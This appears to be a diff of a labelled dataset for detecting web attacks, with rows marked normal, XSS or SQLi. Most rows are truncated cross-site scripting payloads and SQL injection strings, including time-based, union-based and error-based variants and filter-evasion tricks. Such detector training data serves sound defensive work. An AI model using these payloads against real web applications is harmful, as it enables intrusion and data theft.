onpointerup=alert(1)>XSS</wbr>,1,XSS,5629 +<;scrscriptipt>;alert(1)<;/scrscriptipt>;,1,XSS,1684 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,16136 +"1"" ) ) rlike ( select ( case when ( 7689 = 7689 ) ",2,SQLi,20566 +1'|| ( select 'kgfu' from dual where 2607 = 2607 a,2,SQLi,16338 +<progress onpointermove=alert(1)>XSS</progress>,1,XSS,6449 +"1"" ) as xrsi where 9498 = 9498",2,SQLi,20503 "&lt;STYLE&gt;li {list-style-image&#58; url(\""javas",1,XSS,989 -1' ) ) as usrk where 6324 = 6324 union all select ,2,SQLi,15084 -or x = x,2,SQLi,11646 -"-9382' ) union all select 4774,4774,4774,4774--",2,SQLi,19281 -"1' ) where 3476 = 3476 and elt ( 1210 = 1210,sleep",2,SQLi,20163 -select ( case when ( 1082 = 6755 ) then 1082 else ,2,SQLi,22043 -anything' OR 'x' = 'x,2,SQLi,11723 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3094 -1' in boolean mode ),2,SQLi,19540 -1' and 6240 = ( 'qqpjq'|| ( select case 6240 when ,2,SQLi,13262 -1 ) where 7159 = 7159,2,SQLi,13999 -"select * from generate_series ( 6200,6200,case whe",2,SQLi,18208 -"{""id"":null,""name"":""person""}",0,normal,27111 -1 and 8635 = ( select count ( * ) from generate_se,2,SQLi,17483 -AnD SLEEP(5)--,2,SQLi,10397 -<ul onpointerleave=alert(1)>XSS</ul>,1,XSS,2845 -<body onhashchange=alert(1)><a href=#x>click this!,1,XSS,9079 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3343 -"1' ) union all select null,null,null,null,null,nul",2,SQLi,16423 -<animate onpointerdown=alert(1)>XSS</animate>,1,XSS,6541 -"{""id"":null,""name"":""WarGreymon""}",0,normal,26923 -"1"" ) ) as ydkd where 2455 = 2455 and sleep ( 5 ) -",2,SQLi,14289 -You can mass select messages by clicking the first,0,normal,25092 -"<address oncut=""alert(1)"" contenteditable>test</ad",1,XSS,3357 -1' ) ) as njop where 7001 = 7001,2,SQLi,13026 -select * from users where id = 1 or 1&@# = 1 union,2,SQLi,11746 -select * from users where id = '1' union select @ ,2,SQLi,11802 -"1"" ) where 5814 = 5814 and 6969 = ( select 6969 fr",2,SQLi,14415 -<element id=x tabindex=1 onactivate=alert(1)></ele,1,XSS,7814 -"{""id"":null,""firstName"":""Hu"",""lastName"":""Jiakang"",""",0,normal,27248 -The Baluch character is influenced by its environm,0,normal,25483 -Select cut.,0,normal,24605 -"-8200' in boolean mode ) union all select 3360,336",2,SQLi,21511 -<details onpointerenter=alert(1)>XSS</details>,1,XSS,2429 -"1' ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ",2,SQLi,21428 --2951 or 4144 = ( select upper ( xmltype ( chr ( 6,2,SQLi,21731 -"Then, they strategically select each recyclable ma",0,normal,25339 -select * from users where id = 1 + \+%$ or 1 = 1 -,2,SQLi,11940 -"1' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 11",2,SQLi,21196 -Select your company.,0,normal,24861 -"1' or row ( 1045,7562 ) > ( select count ( * ) ,co",2,SQLi,17071 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4800 -Where's the best place to capture natural beauty?,0,normal,23822 -<mark onpointerup=alert(1)>XSS</mark>,1,XSS,2354 -Filter the spam filters.,0,normal,22738 -"-4427' ) ) union all select 6357,6357,6357,6357,63",2,SQLi,16379 -admin' or 1 = 1#,2,SQLi,11384 --8615 ) ) ) or 4039 = 9144,2,SQLi,20954 -Select access.,0,normal,24598 -"1"" ) ) as ycvh where 4523 = 4523 and sleep ( 5 ) #",2,SQLi,19137 -<body onfocus=alert(1)>,1,XSS,9078 -<noframes id=x tabindex=1 onbeforeactivate=alert(1,1,XSS,8074 -That goal is evident in the books that schools sel,0,normal,25494 -"1"" ) ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( ch",2,SQLi,14860 --4289' or 2724 in ( ( char ( 113 ) +char ( 113 ) +,2,SQLi,17425 -"{""id"":null,""firstName"":""Alvin Tak"",""lastName"":""Kho",0,normal,26969 -"<output onclick=""alert(1)"">test</output>",1,XSS,7492 -"1"" ) where 6823 = 6823 or char ( 117 ) ||char ( 11",2,SQLi,17650 -1%' ) ) and ( 3020 = 3020 ) *6703 and ( ( '%' = ',2,SQLi,12772 -select,0,normal,26625 -<meter id=x tabindex=1 onfocusin=alert(1)></meter>,1,XSS,7060 -1 ) ) as huxq where 7451 = 7451 union all select n,2,SQLi,13508 -"1"" where 7015 = 7015 procedure analyse ( extractva",2,SQLi,16662 -"<hgroup onkeypress=""alert(1)"" contenteditable>test",1,XSS,5085 -<ol onpointerover=alert(1)>XSS</ol>,1,XSS,2383 +"1"" ) ) rlike sleep ( 5 ) and ( ( ""fzlr"" = ""fzlr",2,SQLi,15086 +select * from users where id = 11<1# union select ,2,SQLi,11648 +1' ) ) and 6414 = ( select count ( * ) from rdb$fi,2,SQLi,19283 +1' ) ) as kgfp where 2366 = 2366,2,SQLi,20165 +"-7656"" ) ) ) union all select 3172,3172,3172,3172,",2,SQLi,22045 +select * from users where id = 1 union select ( 1 ,2,SQLi,11725 +"<strong onmouseup=""alert(1)"">test</strong>",1,XSS,3095 +1 ) as rsyw where 4857 = 4857 or ( select 2* ( if ,2,SQLi,19542 +"1%' ) procedure analyse ( extractvalue ( 9627,conc",2,SQLi,13264 +1' ) ) as omwk where 1414 = 1414 and char ( 120 ) ,2,SQLi,14001 +select ( case when ( 7169 = 7785 ) then 1 else 716,2,SQLi,18210 +"{""id"":null,""name"":""Tepig""}",0,normal,27109 +1' ) where 4003 = 4003,2,SQLi,17485 +&&SLEEP(5),2,SQLi,10399 +<article onblur=alert(1) tabindex=1 id=x></article,1,XSS,2846 +<body onorientationchange=alert(1)>,1,XSS,9081 +"<head onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,3345 +1 ) ) ) or 5286 = ( select count ( * ) from all_us,2,SQLi,16425 +"<rb draggable=""true"" ondragend=""alert(1)"">test</rb",1,XSS,6543 +"{""id"":null,""name"":""Devimon""}",0,normal,26920 +end and ( 'nchh' = 'nchh,2,SQLi,14291 +You can find the new collection in select Levi's s,0,normal,25094 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3359 +"1' ) ) and elt ( 4249 = 4249,7259 ) and ( ( 'miir'",2,SQLi,13028 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11748 +"select * from users where id = 1 or "" ) {"" or 1 = ",2,SQLi,11804 +1' where 8770 = 8770 union all select null--,2,SQLi,14417 +"<samp oncopy=""alert(1)"" contenteditable>test</samp",1,XSS,7816 +"{""id"":null,""name"":""Indian Rhinoceros""}",0,normal,27246 +The animation allows the user to select from a num,0,normal,25485 +Select redo.,0,normal,24607 +1'+ ( select 'lawc' where 1171 = 1171 or 8156 = ( ,2,SQLi,21513 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2430 +"1"" where 7232 = 7232 ( select ( case when ( 5451 =",2,SQLi,21430 +"1"" ) as pkkx where 6716 = 6716 and updatexml ( 339",2,SQLi,21733 +"Then select Settings, and scroll down to the area ",0,normal,25341 +"select * from users where id = 1 or @#"". = 1 or 1 ",2,SQLi,11942 +1 and 5556 = ( select count ( * ) from all_users t,2,SQLi,21198 +Select your department.,0,normal,24863 +-1549' ) or 4144 = ( select upper ( xmltype ( chr ,2,SQLi,17073 +"<head oncontextmenu=""alert(1)"">test</head>",1,XSS,4802 +I'll select a new game to play online.,0,normal,23824 +"<blink draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,2355 +Delete the expired subscriptions.,0,normal,22740 +1'+ ( select 'vfkl' where 1713 = 1713 and 8514 = (,2,SQLi,16381 +or 1 = 1 --,2,SQLi,11386 +1 ) and 4386 = utl_inaddr.get_host_address ( chr (,2,SQLi,20956 +Select close.,0,normal,24600 +1' ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ),2,SQLi,19139 +<body onhelp=alert(1)>press F1! (MSIE),1,XSS,9080 +"<dt onpaste=""alert(1)"" contenteditable>test</dt>",1,XSS,8076 +TechCrunch's editorial team will review all applic,0,normal,25496 +1' in boolean mode ) rlike sleep ( 5 ) #,2,SQLi,14862 +-2165' where 6593 = 6593 or 9158 = 7254--,2,SQLi,17427 +"{""id"":null,""firstName"":""Irene"",""lastName"":""Tan"",""a",0,normal,26966 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7494 +"1"" ) ) and 8189 = ( select count ( * ) from sysibm",2,SQLi,17652 +"1%"" and 2716 = ( select count ( * ) from sysusers ",2,SQLi,12774 +select,0,normal,26622 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7062 +-8924 ) ) as jybr where 7901 = 7901 or elt ( 1032 ,2,SQLi,13510 +"-1869"" ) ) ) union all select 7122,7122,7122,7122,",2,SQLi,16664 +"<style>@keyframes x{}</style><content style=""anima",1,XSS,5087 +<thead id=x tabindex=1 onactivate=alert(1)></thead,1,XSS,2384 `'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</sc,1,XSS,572 -&lt;IMG SRC=&quot;jav&#x09;ascript:alert(&apos;XSS,1,XSS,1436 -"1%"" ) ) rlike sleep ( 5 ) #",2,SQLi,13282 -"![a](""onerror=""alert(1))",1,XSS,9440 -1' ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ,2,SQLi,21737 -"select * from users where id = 1 union select @ $,",2,SQLi,11719 -"1%' and 2388 = benchmark ( 5000000,md5 ( 0x6d45715",2,SQLi,14750 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10707 -<embed onpointerout=alert(1)>XSS</embed>,1,XSS,5446 +&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&apos,1,XSS,1437 +"1' ) ) ) union all select null,null,null,null,null",2,SQLi,13284 +[XSS](.alert(1);),1,XSS,9442 +-1157 ) ) as sxie where 7118 = 7118 or 5023 = ctxs,2,SQLi,21739 +select * from users where id = 1 <@<@ union select,2,SQLi,11721 +"-6123"" or 5903 = ( 'qqpjq'|| ( select case 5903 wh",2,SQLi,14752 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10709 +<dfn onpointerout=alert(1)>XSS</dfn>,1,XSS,5448 "xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\""XSS\"")",1,XSS,1008 -<rp id=x tabindex=1 onbeforeactivate=alert(1)></rp,1,XSS,4544 -1'+ ( select qtyi where 7147 = 7147,2,SQLi,12988 -<tt onpointerenter=alert(1)>XSS</tt>,1,XSS,7010 -document.documentURI,1,XSS,2065 -<scr<script>ipt>alert(document.cookie)</scr</scrip,1,XSS,1137 -or ''^',2,SQLi,9883 -1 ) ) as vycb where 3524 = 3524 and 6414 = ( selec,2,SQLi,21728 -or 1=1 /*,2,SQLi,10178 +<menu id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,4546 +"-7858' ) union all select 1541,1541,1541,1541,1541",2,SQLi,12990 +"<section onkeyup=""alert(1)"" contenteditable>test</",1,XSS,7012 +Set.constructor`alert\x28document.domain\x29```,1,XSS,2066 +%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22,1,XSS,1138 +"or ""-",2,SQLi,9885 +"1"" ) ) ) or 8315 = ( select count ( * ) from sysib",2,SQLi,21730 +"or 1=1 or """"=",2,SQLi,10180 "<EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScri",1,XSS,295 -We've been asking respondents to select from the l,0,normal,25165 -"1' ) union all select null,null,null,null,null,nul",2,SQLi,16078 -1 ) ) and 8635 = ( select count ( * ) from generat,2,SQLi,18788 -"<style>@keyframes x{}</style><span style=""animatio",1,XSS,3999 -"echo('IPT>alert(""XSS"")</SCRIPT>'); ?>",1,XSS,9767 -"<header onmouseenter=""alert(1)"">test</header>",1,XSS,3742 -"select * from users where id = 1 or "" ( ["" or 1 = ",2,SQLi,11701 -select,0,normal,26563 -<select autofocus onfocusin=alert(1)>,1,XSS,2720 -word1,0,normal,26534 -1 where 5929 = 5929 or 5286 = ( select count ( * ),2,SQLi,12714 -"1%' and elt ( 7619 = 1489,1489 ) and '%' = '",2,SQLi,14871 -"-4127%' union all select 9558,9558,9558#",2,SQLi,21535 -"1 ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76555",2,SQLi,16371 -"<strong draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,2809 -<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG ,1,XSS,9018 -1 ) as asmt where 4986 = 4986 union all select nul,2,SQLi,16941 -"-8812"" ) where 1646 = 1646 union all select 1646,1",2,SQLi,16107 -#ERROR!,2,SQLi,22535 -1 ) where 6304 = 6304,2,SQLi,21180 -"<? echo('<SCR)'; echo('IPT>alert("""")</SCRIPT>'); ?",1,XSS,2470 -<style>:target {transform: rotate(180deg);}</style,1,XSS,3739 -1' ) ) or 4411 = ( select count ( * ) from sysuser,2,SQLi,20671 --3326'+ ( select xitp where 7621 = 7621 union all ,2,SQLi,13482 --3136%' ) or 3400 = 6002,2,SQLi,18989 +"Wet n Wild MegaGlo Highlighting Powder, $3.99, ava",0,normal,25167 +"1"" and updatexml ( 3393,concat ( 0x2e,0x7171706a71",2,SQLi,16080 +1' ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( 'ujds,2,SQLi,18790 +<style id=x tabindex=1 onfocusin=alert(1)></style>,1,XSS,4001 +&#060;,1,XSS,9769 +<strike id=x tabindex=1 onfocus=alert(1)></strike>,1,XSS,3744 +select * from users where id = 1 or \<1 or 1 = 1 -,2,SQLi,11703 +"{""id"":null,""name"":""continued""}",0,normal,27527 +"<hgroup onmouseup=""alert(1)"">test</hgroup>",1,XSS,2721 +where,0,normal,26531 +"-7267 ) union all select 1912,1912,1912,1912,1912,",2,SQLi,12716 +1'+ ( select zpdf where 2938 = 2938,2,SQLi,14873 +-4208%' ) ) ) or 1133 = 9010--,2,SQLi,21537 +"-7714 where 9768 = 9768 union all select 9768,9768",2,SQLi,16373 +"<ul oncopy=""alert(1)"" contenteditable>test</ul>",1,XSS,2810 +"<!--[if<img src=x onerror=alert(2)//]> -->//[""'`--",1,XSS,9020 +select sleep ( 5 ) and ( '%' = ',2,SQLi,16943 +waitfor delay '0:0:5' and ( 'eaxu' = 'eaxu,2,SQLi,16109 +#ERROR!,2,SQLi,22537 +"-2901"" or elt ( 9866 = 9099,9099 ) and ""asib"" like",2,SQLi,21182 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2471 +<svg><dd onload=alert(1)></dd>,1,XSS,3741 +"1 ) and 8148 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,20673 +-6095' ) or 6872 = 6872 and ( 'bfwm' like 'bfwm,2,SQLi,13484 +1' ) ) rlike ( select * from ( select ( sleep ( 5 ,2,SQLi,18991 "<audio src=1 href=1 onerror=""javascript:alert(1)"">",1,XSS,363 -</script><script>alert('');</script>,1,XSS,6925 -"1' ) ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and (",2,SQLi,18089 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,14689 -"<template onkeydown=""alert(1)"" contenteditable>tes",1,XSS,2140 -"1"" and 7533 = 7533 and ""dqjp"" = ""dqjp",2,SQLi,19624 -1 ) where 6039 = 6039 and 2853 = cast ( ( chr ( 11,2,SQLi,18768 -"<ul onmouseout=""alert(1)"">test</ul>",1,XSS,7315 -1' or 2633 = dbms_pipe.receive_message ( chr ( 112,2,SQLi,20696 -"onfocus=alert(document.domain) > <""",1,XSS,1313 --5585' or 4144 = ( select upper ( xmltype ( chr ( ,2,SQLi,20315 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6184 -") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ",2,SQLi,11304 -"<;INPUT TYPE="";IMAGE""; SRC="";javascript:alert(';XS",1,XSS,1592 -"{""id"":null,""firstName"":""Catherine"",""lastName"":""Hie",0,normal,26790 -"-7802' ) ) ) or elt ( 8778 = 9974,9974 ) and ( ( (",2,SQLi,18547 -"<option onmousedown=""alert(1)"">test</option>",1,XSS,2397 -1 ) ) and 6414 = ( select count ( * ) from rdb$fie,2,SQLi,16702 --1648 ) ) as oqqy where 3459 = 3459 or 6872 = 6872,2,SQLi,14560 -"javascript:alert()//""/*`/*'/*\""/*--></title></text",1,XSS,9517 -<style>:target {color:red;}</style><ol id=x style=,1,XSS,5234 -Here are some select papers and suggestions for fu,0,normal,26103 -"1"" ) where 8702 = 8702 union all select null,null,",2,SQLi,21453 -1' ) ) as wqhm where 9871 = 9871,2,SQLi,20421 -`'><script>\xE2\x80\xAFjavascript:alert(520)</scri,1,XSS,8988 -<del onpointerenter=alert(1)>XSS</del>,1,XSS,3021 -admin'/*,2,SQLi,9904 -"<tfoot onmousemove=""alert(1)"">test</tfoot>",1,XSS,8229 -"<div id=""117""><a href=""http://attacker.org"">",1,XSS,9106 -"1"" ) ) as thoj where 1577 = 1577 or char ( 75 ) ||",2,SQLi,13914 -<menuitem onblur=alert(1) tabindex=1 id=x></menuit,1,XSS,5296 -"<marquee onmouseout=""alert(1)"">test</marquee>",1,XSS,3973 --7636' ) or 5898 = 8880 and ( 'sjuv' = 'sjuv,2,SQLi,21755 -"1' or 8384 = like ( 'abcdefg',upper ( hex ( random",2,SQLi,14664 -"<header draggable=""true"" ondrag=""alert(1)"">test</h",1,XSS,4134 +"<rtc oncut=""alert(1)"" contenteditable>test</rtc>",1,XSS,6927 +1'+ ( select idnb where 2338 = 2338,2,SQLi,18091 +-1564' ) order by 1--,2,SQLi,14691 +"<marquee oncut=""alert(1)"" contenteditable>test</ma",1,XSS,2141 +select ( case when ( 1227 = 4014 ) then 1227 else ,2,SQLi,19626 +1 ) and 7533 = 7533,2,SQLi,18770 +"<keygen draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,7317 +-1876'|| ( select 'itfc' from dual where 9584 = 95,2,SQLi,20698 +"<FRAMESET><FRAME SRC=\""javascript:alert('XSS');\"">",1,XSS,1314 +1'+ ( select 'xqpe' where 4020 = 4020 union all se,2,SQLi,20317 +"<audio onmousedown=""alert(1)"">test</audio>",1,XSS,6186 +"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AN",2,SQLi,11306 +"<;IMG SRC="";javascript:alert(';XSS';);"";>;",1,XSS,1593 +"{""id"":null,""firstName"":""Kp"",""lastName"":""Lee"",""spec",0,normal,26787 +"1"" and elt ( 1210 = 1210,sleep ( 5 ) ) and ""zhxm"" ",2,SQLi,18549 +"<basefont onmouseenter=""alert(1)"">test</basefont>",1,XSS,2398 +1' ) ) or 9643 = ( select count ( * ) from domain.,2,SQLi,16704 +"-5372"" ) as wlqm where 2432 = 2432 union all selec",2,SQLi,14562 +"javascript:/*""/*\""/*`/*'/**/ (alert())//</title></",1,XSS,9519 +<video src/onerror=alert(1)>,1,XSS,5236 +His advisers were men like the famous jurist Ulpia,0,normal,26100 +"-6075' union all select 9988,9988,9988,9988,9988,9",2,SQLi,21455 +-3458' ) where 2053 = 2053 or 4747 = dbms_utility.,2,SQLi,20423 +`'><script>\xE514\x9A\x80javascript:alert(514)</sc,1,XSS,8990 +<style>:target {transform: rotate(180deg);}</style,1,XSS,3022 +admin' or '1'='1'--,2,SQLi,9906 +"<form onkeypress=""alert(1)"" contenteditable>test</",1,XSS,8231 +"<div id=""119""><iframe src=""view-source:http://www.",1,XSS,9108 +"-4772 ) ) ) union all select 3879,3879,3879,3879,3",2,SQLi,13916 +"<ruby draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,5298 +<style id=x tabindex=1 ondeactivate=alert(1)></sty,1,XSS,3975 +"-8893 ) union all select 7594,7594,7594,7594,7594,",2,SQLi,21757 +1 waitfor delay '0:0:5'-- nnnp,2,SQLi,14666 +<select onpointerdown=alert(1)>XSS</select>,1,XSS,4136 "&lt;INPUT TYPE=\""IMAGE\"" SRC=\""javascript&#058;ale",1,XSS,975 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7292 -Several pharmaceutical companies temporarily froze,0,normal,25560 -"1"" and 6414 = ( select count ( * ) from rdb$fields",2,SQLi,15586 -waitfor delay '0:0:5' and ( ( ( 'hrta' = 'hrta,2,SQLi,17339 -"<%tag onmouseover=""(alert('XSS'))""> is invalid. <%",1,XSS,9753 --4248 where 3288 = 3288 or 4144 = ( select upper (,2,SQLi,13775 -Retrieve data where available.,0,normal,23266 -<style>:target {color:red;}</style><td id=x style=,1,XSS,5017 -1' ) ) as lrnh where 8569 = 8569 union all select ,2,SQLi,17603 -Select your preferred search engine from the list ,0,normal,25564 -""",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/",2,SQLi,10875 -Where's the perfect spot to have a picnic?,0,normal,23875 -"1"" ) ) ) or sleep ( 5 ) and ( ( ( ""eran"" = ""eran",2,SQLi,13240 -1' where 8864 = 8864,2,SQLi,18025 -"1"" and sleep ( 5 )",2,SQLi,17675 -or isNULL ( 1/0 ) /*,2,SQLi,11874 -"1"" ) ) and make_set ( 8403 = 8403,8899 ) and ( ( """,2,SQLi,17765 -<menu id=x tabindex=1 ondeactivate=alert(1)></menu,1,XSS,1934 -"<details onmousemove=""alert(1)"">test</details>",1,XSS,4676 -AND 1083=1083 AND (1427=1427,2,SQLi,10223 +"<col onmousemove=""alert(1)"">test</col>",1,XSS,7294 +selecting the varying lenghts,0,normal,25562 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,15588 +"1"" ) where 2445 = 2445",2,SQLi,17341 +alert(a.source)</SCRIPT>,1,XSS,9755 +1' ) ) ) and ( select 9067 from ( select count ( *,2,SQLi,13777 +Calculate totals where necessary.,0,normal,23268 +"<caption onkeypress=""alert(1)"" contenteditable>tes",1,XSS,5019 +"1"" ) ) as qode where 2398 = 2398 procedure analyse",2,SQLi,17605 +Select your Internet connection type from the list,0,normal,25566 +"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/",2,SQLi,10877 +I need to select a new recipe to try.,0,normal,23877 +1'+ ( select gqez where 3704 = 3704,2,SQLi,13242 +1' ) ) union all select null--,2,SQLi,18027 +1 ) ) as jvvs where 9594 = 9594,2,SQLi,17677 +"select * from users where id = 1 or "" ) ( "" = 1 or",2,SQLi,11876 +"-5800"" ) or 6872 = 6872 and ( ""tcab"" like ""tcab",2,SQLi,17767 +<element onpointerenter=alert(1)>XSS</element>,1,XSS,1935 +"<div onmouseenter=""alert(1)"">test</div>",1,XSS,4678 +AND 1083=1083 AND ('1427=1427,2,SQLi,10225 <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&N,1,XSS,893 -<legend id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,7288 -"1"" ) as lipa where 3450 = 3450 and make_set ( 8403",2,SQLi,21261 -"<s onmouseenter=""alert(1)"">test</s>",1,XSS,7907 -Select decline.,0,normal,24579 -1'|| ( select 'rqzu' from dual where 9516 = 9516 o,2,SQLi,14552 -Let's decide where to go for a hike.,0,normal,23697 -The Industrial Select Sector SPDR Fund ETF is up 5,0,normal,25426 -"-8734%"" ) or 4493 = utl_inaddr.get_host_address ( ",2,SQLi,18851 -"<time oncut=""alert(1)"" contenteditable>test</time>",1,XSS,7658 -x' AND members.email IS NULL; --,2,SQLi,10107 -1' ) where 5287 = 5287 and 7533 = 7533--,2,SQLi,18298 -email=' WAITFOR DELAY '0:0:5'--,2,SQLi,11363 -1' ) ) as yqcl where 5026 = 5026 rlike ( select * ,2,SQLi,13833 -1 where 3956 = 3956,2,SQLi,19121 +"<style>@keyframes slidein {}</style><body style=""a",1,XSS,7290 +waitfor delay '0:0:5' and ( ( 'uvlf' = 'uvlf,2,SQLi,21263 +"<style>@keyframes x{}</style><element style=""anima",1,XSS,7909 +Select enter.,0,normal,24581 +"1%"" ) ) ) and char ( 120 ) ||char ( 106 ) ||char (",2,SQLi,14554 +He selected a painting to hang on the wall.,0,normal,23699 +The idea of automatic telephony is to substitute f,0,normal,25428 +"1"" ) as amak where 7938 = 7938 and elt ( 1210 = 12",2,SQLi,18853 +"<th onmouseenter=""alert(1)"">test</th>",1,XSS,7660 +0x770061006900740066006F0072002000640065006C00 ...,2,SQLi,10109 +-1662 where 1119 = 1119 or ( 8459 = 8459 ) *4906--,2,SQLi,18300 +#ERROR!,2,SQLi,11365 +"select * from generate_series ( 9709,9709,case whe",2,SQLi,13835 +"-3205"" ) union all select 5233,5233,5233,5233#",2,SQLi,19123 "<a href=""javascript:javascript:alert(1)""><event-so",1,XSS,727 -"<source onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,7215 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8246 -"1 procedure analyse ( extractvalue ( 9255,concat (",2,SQLi,18181 -select sleep ( 5 ) ) +',2,SQLi,15877 -"1"" ) as axua where 6718 = 6718",2,SQLi,20230 -"1 ) where 1013 = 1013 and 4241 = convert ( int, ( ",2,SQLi,14200 -Update your plans.,0,normal,22787 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3",2,SQLi,10746 -1 ) ) as ogcv where 4396 = 4396,2,SQLi,17321 --6405 ) as ilah where 5145 = 5145 union all select,2,SQLi,18650 -1 ) ) or 7417 = ( select count ( * ) from sysibm.s,2,SQLi,17209 -"<menu draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,7275 -select * from users where id = 1 or \<\. union sel,2,SQLi,11594 -&lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;),1,XSS,1390 -"<map draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,3565 -<base href=//0>,1,XSS,9077 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5430 +"<details onkeyup=""alert(1)"" contenteditable>test</",1,XSS,7217 +<pre id=x tabindex=1 onfocus=alert(1)></pre>,1,XSS,8248 +"1%"" ) ) ) and ( 3502 = 7893 ) *7893 and ( ( ( ""%"" ",2,SQLi,18183 +( select ( case when ( 3950 = 2747 ) then 1 else 1,2,SQLi,15879 +1'+ ( select 'ueak' where 7329 = 7329 and 2853 = c,2,SQLi,20232 +"1' ) ) ) and elt ( 9501 = 8427,8427 ) and ( ( ( 'a",2,SQLi,14202 +Join the band.,0,normal,22789 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5",2,SQLi,10748 +1 ) as ocut where 6800 = 6800 and elt ( 4249 = 424,2,SQLi,17323 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,18652 +"1, ( select ( case when ( 1255 = 8025 ) then 1 els",2,SQLi,17211 +<style>:target {color:red;}</style><menu id=x styl,1,XSS,7277 +"select * from users where id = 1 or ""%_"" or 1 = 1 ",2,SQLi,11596 +&lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.,1,XSS,1391 +"<link ondblclick=""alert(1)"">test</link>",1,XSS,3567 +<body onhashchange=alert(1)><a href=#x>click this!,1,XSS,9079 +<textarea onfocusout=alert(1) id=x></textarea><inp,1,XSS,5432 "{""id"":null,""name"":""Empoleon""}",0,normal,27449 -1' ) where 9538 = 9538,2,SQLi,16221 -Select a fragrance for the room.,0,normal,24212 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,22075 -"1%"" procedure analyse ( extractvalue ( 9255,concat",2,SQLi,14900 -Randomly select a song.,0,normal,24263 -"1 ) ) and extractvalue ( 7982,concat ( 0x5c,0x7171",2,SQLi,15513 -"-5372"" ) as wlqm where 2432 = 2432 union all selec",2,SQLi,14562 -"<script onmousemove=""alert(1)"">test</script>",1,XSS,1869 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8203 -He ordered a meal from the food delivery app.,0,normal,23871 -"<IMG """"""><SCRIPT>alert(""XSS"")</SCRIPT>"">",1,XSS,807 -"<q onmousedown=""alert(1)"">test</q>",1,XSS,4806 -In some districts he may not marry into his own vi,0,normal,26000 -1' ) ) as plbt where 4368 = 4368 and 3754 = ( sele,2,SQLi,12261 -"""Select ""channel"" on the left menu, then click ""st",0,normal,26455 -"{""id"":null,""firstName"":""Isaiah"",""lastName"":""Toh"",""",0,normal,27561 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10427 -"<div id=""96""><iframe src=mhtml:http://html5sec.org",1,XSS,9156 -I need to decide where to have dinner.,0,normal,23896 -They select the best.,0,normal,24441 --3359' order by 1--,2,SQLi,15153 -<multicol id=x tabindex=1 onfocusin=alert(1)></mul,1,XSS,4495 -"<ol oncut=""alert(1)"" contenteditable>test</ol>",1,XSS,2633 -"1"" ) and 6240 = ( 'qqpjq'|| ( select case 6240 whe",2,SQLi,14287 -His extensive knowledge of banking was displayed i,0,normal,26099 -"To capture the entire screen, select Command+Shift",0,normal,25281 -Select your succeed.,0,normal,25008 -"<output onmousedown=""alert(1)"">test</output>",1,XSS,7833 -"1%"" ) ) ) and 8312 = dbms_pipe.receive_message ( c",2,SQLi,20773 -"1 ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a",2,SQLi,14270 +"-6854"" where 7794 = 7794 union all select 7794,779",2,SQLi,16223 +Select the best playlist for your mood.,0,normal,24214 +1' ) ) ) or 5356 = ( select count ( * ) from sysus,2,SQLi,22077 +1' ) ) as dtwh where 9633 = 9633 and char ( 109 ) ,2,SQLi,14902 +Select your dream job.,0,normal,24265 +1 ) ) and ( select 2* ( if ( ( select * from ( sel,2,SQLi,15515 +select ( case when ( 4690 = 4373 ) then 4690 else ,2,SQLi,14564 +"<td onmouseenter=""alert(1)"">test</td>",1,XSS,1870 +"<rtc onpaste=""alert(1)"" contenteditable>test</rtc>",1,XSS,8205 +Let's explore where the 